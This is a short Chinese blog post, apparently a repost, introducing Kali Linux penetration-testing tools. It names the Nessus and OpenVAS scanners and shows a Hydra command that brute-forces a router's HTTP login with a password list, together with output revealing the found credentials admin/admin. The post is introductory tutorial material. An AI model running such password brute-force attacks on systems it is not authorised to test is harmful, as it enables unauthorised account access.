博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Kali linux渗透测试常用工具汇总2-渗透攻击
阅读量:5873 次
发布时间:2019-06-19

本文共 967 字,大约阅读时间需要 3 分钟。

渗透攻击的思路一般是扫描漏洞,然后利用不同的漏洞,才有针对的渗透攻击。

 

漏洞扫描的工具有Nessus,该工具可同时在本地或远端遥控,对系统的漏洞分析扫描。Nessus通过新建扫描策略,并添加对应的插件,便可以对系统漏洞进行扫描。

另一个漏洞扫描工具是OpenVAS,在这里不做说明。

 

上面说明漏洞扫描,下面说下渗透攻击常用的工具Hydra和Medusa。

举个破解路由器登录密码的例子。

root@alexknight:~# hydra  -l admin -P /tmp/tt.txt -f -V -e nsr -s 80 -t 1  192.168.1.1 http-getHydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes onlyHydra (http://www.thc.org/thc-hydra) starting at 2015-08-09 22:19:37[WARNING] You must supply the web page as an additional option or via -m, default path set to /[DATA] 1 task, 1 server, 7 login tries (l:1/p:7), ~7 tries per task[DATA] attacking service http-get on port 80[ATTEMPT] target 192.168.1.1 - login "admin" - pass "admin" - 1 of 7 [child 0][80][www] host: 192.168.1.1   login: admin   password: admin[STATUS] attack finished for 192.168.1.1 (valid pair found)1 of 1 target successfully completed, 1 valid password foundHydra (http://www.thc.org/thc-hydra) finished at 2015-08-09 22:19:38

 

转载地址:http://jchnx.baihongyu.com/

你可能感兴趣的文章
OpenS-CAD学习(1)
查看>>
java实现https ssl请求url
查看>>
【wikioi】1025 选菜
查看>>
emacs之配置yasnippet
查看>>
VisualStudio:让 XML 支持智能提示
查看>>
用于守护进程的出错处理函数
查看>>
AppCan可以视为Rexsee的存活版
查看>>
【转】SQL SERVER 2005 数据库状态为“可疑”的解决方法
查看>>
事件、委托、委托方法的总结(使用EventHandler<>)
查看>>
Revit API 创建带箭头的标注
查看>>
jetty启动报错Unsupported major.minor version 51.0
查看>>
Xamarin.Android开发实践(七)
查看>>
彩色图像上执行Mean Shift迭代搜索目标 ,维加权直方图 + 巴氏系数 + Mean Shift迭代...
查看>>
深入理解JavaScript系列
查看>>
strtol 函数用法
查看>>
eclipse内存溢出设置
查看>>
搭建jenkins环境(linux操作系统)
查看>>
VS 2015 GIT操作使用说明
查看>>
上海办理房产税变更
查看>>
innerHTML与jquery里的html()区别介绍
查看>>